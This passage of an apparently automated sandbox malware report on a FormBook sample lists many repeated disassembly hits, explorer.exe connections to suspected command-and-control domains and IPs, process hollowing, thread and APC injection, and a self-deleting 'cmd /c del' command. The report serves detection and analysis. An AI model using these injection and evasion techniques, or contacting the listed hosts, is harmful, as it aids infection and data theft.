          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04631C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04631C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04631C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04631C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04631C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04631C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04631C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04631C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04631C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04631C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04631C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04631C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04631C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04631C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0464740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0464740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0464740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045ABC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_046314FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045F6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045F6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045F6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04648CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0458849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04597D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045F3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04623D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0459C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0459C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04648D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0463E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0457AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045FA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04583D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04583D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04583D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04583D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04583D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04583D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04583D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04583D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04583D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04583D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04583D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04583D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04583D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0463FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0463FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0463FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0463FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04628DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045F6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0458D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0458D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045AFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045AFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_046405AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_046405AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04572D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04572D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04572D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04572D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04572D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04587E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04587E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04587E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04587E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04587E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04587E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0463AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0463AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0459AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0459AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0459AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0459AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0459AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0458766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045AA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045AA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0457C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0457C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0457C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0462FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04631608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0457E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0462FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04648ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045876E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04640EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04640EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04640EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0460FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045F46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04648F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0458EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0458FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0459F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045AA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045AA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0459B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0459B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0464070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0464070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045AE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0460FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0460FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04574F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04574F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045F7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045F7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045F7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04588794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04590050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04590050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04632073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04641074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045F7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045F7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045F7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0459A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0459A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0459A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0459A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04644015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04644015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0458B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0458B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0458B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0458B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0460B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0460B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0460B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0460B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0460B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0460B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045740E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045740E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045740E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045758EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0459B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0459B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04579080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045F3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045F3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045AF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045AF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045AF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0459B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0459B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0457B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0457B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0457C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04579100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04579100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04579100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04594120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 62.149.128.40 80
          Source: C:\Windows\explorer.exeDomain query: www.growwithjenn.com
          Source: C:\Windows\explorer.exeDomain query: www.oilleakgames.com
          Source: C:\Windows\explorer.exeNetwork Connect: 160.153.136.3 80
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exeDomain query: www.goldgrandpa.com
          Source: C:\Windows\explorer.exeDomain query: www.bring-wellness.com
          Source: C:\Windows\explorer.exeDomain query: www.sw-advisers.com
          Source: C:\Windows\explorer.exeNetwork Connect: 165.22.38.5 80
          Source: C:\Windows\explorer.exeDomain query: www.goodlukc.com
          Source: C:\Windows\explorer.exeDomain query: www.freshdeliciousberryfarm.com
          Source: C:\Windows\explorer.exeDomain query: www.goldinsacks.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 157.245.232.77 80
          Source: C:\Windows\explorer.exeDomain query: www.2dmaxximumrecords.com
          Source: C:\Windows\explorer.exeDomain query: www.allyexpense.com
          Source: C:\Windows\explorer.exeDomain query: www.protectpursuit.com
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeSection loaded: unknown target: C:\Users\user\Desktop\UGGJ4NnzFz.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeThread register set: target process: 3388
          Source: C:\Windows\SysWOW64\cmmon32.exeThread register set: target process: 3388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeSection unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: CA0000
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeProcess created: C:\Users\user\Desktop\UGGJ4NnzFz.exe 'C:\Users\user\Desktop\UGGJ4NnzFz.exe'
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\UGGJ4NnzFz.exe'
          Source: explorer.exe, 00000005.00000000.222167961.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
          Source: explorer.exe, 00000005.00000000.223815044.0000000001980000.00000002.00000001.sdmp, cmmon32.exe, 00000009.00000002.476895776.0000000002CB0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000005.00000000.241512606.000000000871F000.00000004.00000001.sdmp, cmmon32.exe, 00000009.00000002.476895776.0000000002CB0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.223815044.0000000001980000.00000002.00000001.sdmp, cmmon32.exe, 00000009.00000002.476895776.0000000002CB0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.223815044.0000000001980000.00000002.00000001.sdmp, cmmon32.exe, 00000009.00000002.476895776.0000000002CB0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 0_2_00405B88 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000001.216556670.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.477114884.00000000041D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.274028278.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.274258003.00000000008B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.477190198.0000000004210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.274280539.00000000008E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.220100225.0000000002290000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.1.UGGJ4NnzFz.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.UGGJ4NnzFz.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.UGGJ4NnzFz.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.UGGJ4NnzFz.exe.2290000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.UGGJ4NnzFz.exe.2290000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.UGGJ4NnzFz.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000001.216556670.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.477114884.00000000041D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.274028278.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.274258003.00000000008B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.477190198.0000000004210000.00000004.00000001.sdmp, type: MEMORY
